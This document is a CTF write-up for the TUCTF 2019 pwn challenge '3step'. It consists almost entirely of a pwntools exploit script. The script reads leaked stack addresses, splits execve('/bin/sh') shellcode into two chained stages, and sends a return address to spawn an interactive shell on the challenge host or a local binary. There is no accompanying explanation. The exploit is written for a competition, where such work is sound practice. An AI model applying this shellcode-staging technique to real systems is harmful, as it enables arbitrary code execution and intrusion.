Tags: tuctf 

Rating: 0

```
#!/usr/bin/env python2
'''
author : tripoloski
visit : https://tripoloski1337.github.io/
mail : arsalan.dp@gmail.com
generated by skeloski GEF
'''
import sys
from pwn import *
context.update(arch="i386", endian="little", os="linux", log_level="info",)
LOCAL, REMOTE = False, False
TARGET=os.path.realpath("/home/tripoloski/code/ctf/tuCTF-2019/pwn/3step/3step")
elf = ELF(TARGET)

def attach(r):
if LOCAL:
bkps = []
gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
return

def exploit(r):
#attach(r)
r.recvuntil("snacks\n")
buf = int(r.recv(10) , 16)
r.recvuntil("\n")
buf1= int(r.recv(10) , 16)

# source exploit: http://shell-storm.org/shellcode/files/shellcode-752.php
# xor ecx, ecx
# mul ecx
# push ecx
# push 0x68732f2f
# push 0x6e69622f
# mov ebx, esp
# mov al, 11
# int 0x80

# exploit stage 1
p = asm('''
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f
mov edi, '''+ hex(buf1) +'''
jmp edi
''' )

p2 = asm('''
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80
''')

print(len(p))
print(len(p2))

log.info("buffer : " + hex(buf) ) # 18
log.info("buffer1 : " + hex(buf1) )# 16

r.sendlineafter("Step 1:",p)
r.sendlineafter("Step 2:",p2)
r.sendlineafter("Step 3:",p32(buf))

r.interactive()
return

if __name__ == "__main__":
if len(sys.argv)==2 and sys.argv[1]=="remote":
REMOTE = True
r = remote("chal.tuctf.com", 30504)
else:
LOCAL = True
r = process([TARGET,])
exploit(r)
sys.exit(0)

```